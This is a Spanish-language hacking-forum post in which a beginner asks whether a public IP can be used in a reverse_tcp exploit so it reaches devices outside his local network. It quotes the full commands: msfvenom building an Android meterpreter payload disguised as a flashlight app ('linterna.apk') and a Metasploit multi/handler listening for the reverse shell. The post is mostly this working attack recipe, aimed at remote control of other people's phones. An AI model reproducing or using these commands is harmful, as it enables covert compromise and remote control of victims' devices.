elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)  (Leído 6,880 veces)
GreenTick

Desconectado Desconectado

Mensajes: 89


Texto personal?


Ver Perfil WWW
DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)
« en: 16 Junio 2016, 17:36 pm »

Hola a todos. Como he dicho en otro tema, y vuelvo a repetir  :rolleyes: estoy comenzando en esto de la seguridad informatica y soy muy principiante.  el caso es que he estado probando por primeravez esto de los exploits, y me ha surgido una duda. He estado probando un exploit y hay que colocar una IP y un PUERTO. La ayuda que he visto en internet, indica que colocan la IP local, no obstante, me surgio la duda, busque por internet, y me parecio leer que con la IP Publica tambien funciona, y asi puedes ejecutar el exploit en un dispositivo que no este en tu red local.
No obstante, he estado probando y no me ha funcionado. Me gustaria que alguien me respondiese si esto es posible, y tanto si lo es como si no, el por que (Nunca olvidemos que la base es el aprendizaje)

Os dejo los comandos del exploit para que me podais ayudar con mas facilidad. gracias.

Citar
msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk

msfconsole

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
En línea

8Noobs - Más que una comunidad; una familia.
www.telegram.me/proyecto8NOOBS